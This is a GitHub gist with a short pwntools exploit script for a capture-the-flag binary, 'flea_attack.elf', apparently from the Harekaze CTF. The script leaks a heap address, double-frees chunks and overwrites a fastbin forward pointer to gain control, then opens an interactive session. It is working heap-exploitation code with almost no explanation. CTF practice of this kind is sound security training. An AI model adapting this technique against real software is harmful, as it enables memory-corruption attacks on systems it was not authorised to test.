Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
#!/usr/bin/python
import pwn
from pwn import *
p = pwn.process("./flea_attack.elf")
# p = pwn.remote("problem.harekaze.com",20175)
raw_input("<ATTACH NOW>")
p.recv()
# the size is 0x04.
p.sendline("") # no-one cares
p.recvuntil(">")
p.sendline("1")
p.recv()
p.sendline("50")
buf = "blahblah"
buf += p64(0)
buf += p64(0)
buf += p64(0x21)
p.sendline(buf)
p.recvuntil("Addr: ")
basechunk = int(p.recvuntil("\n").rstrip(),16)
print " ADDRESS OF CHUNK AT: %x" % basechunk
raw_input("<STOP>")
p.recvuntil(">")
p.sendline("2")
p.recv()
print " FREEING CHUNK at %x" % (basechunk + 0x20)
p.sendline("%x" % (basechunk + 0x20))
p.recvuntil(">")
p.sendline("2")
p.recv()
p.sendline("%x" % basechunk)
p.recvuntil(">")
print "ALLOCATING FIRST CHUNK WITH OVERWRITE"
p.sendline("1")
p.sendline("50")
buf = "blahblah"
buf += p64(0)
buf += p64(0)
buf += p64(0x21)
# buf += p64()
buf += p64(0x203ff8) # FWD PTR. Must be a valid chunk header.
p.sendline(buf)
p.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.